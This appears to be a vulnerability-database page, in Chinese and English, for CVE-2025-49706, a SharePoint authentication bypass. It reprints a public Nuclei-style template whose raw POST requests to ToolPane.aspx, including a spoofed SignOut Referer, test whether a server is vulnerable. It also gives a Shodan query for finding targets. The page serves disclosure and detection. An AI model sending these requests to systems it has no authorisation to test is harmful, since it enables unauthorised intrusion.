CVE-2025-49706: Microsoft SharePoint Server - Authentication Bypass

日期: 2025-11-21 | 影响软件: Microsoft SharePoint Server | POC: 已公开

漏洞描述

Improper authentication in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.

PoC代码[已公开]

id: CVE-2025-49706

info:
  name: Microsoft SharePoint Server - Authentication Bypass
  author: daffainfo
  severity: medium
  description: |
    Improper authentication in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.
  reference:
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49706
    - https://securelist.com/toolshell-explained/117045/
    - https://www.wiz.io/blog/sharepoint-vulnerabilities-cve-2025-53770-cve-2025-53771-everything-you-need-to-k
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49706
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-49706
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.component:"sharepoint"
  tags: cve,cve2025,sharepoint,auth-bypass,microsoft,vkev,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        MSOTlPn_Uri=&MSOTlPn_DWP=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 301 || status_code == 302'
          - 'contains(all_headers, "Microsoftsharepointteamservices")'
          - 'contains(tolower(body), "object moved")'
        condition: and
        internal: true

  - raw:
      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: /_layouts/SignOut.aspx
        Accept-Encoding: gzip

        MSOTlPn_Uri=&MSOTlPn_DWP=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(all_headers, "Microsoftsharepointteamservices")'
        condition: and
# digest: 4a0a0047304502200aff6f06553e7ed73b0a7b6566eaa4caa34d947f6236bd045f0009c01e205fe502210099bd011d9bbae1cfbbe62b5738fce80ce39cd7adc2280bc87c530b94b7cdbf98:922c64590222798bb761d5b6d8e72950

相关漏洞推荐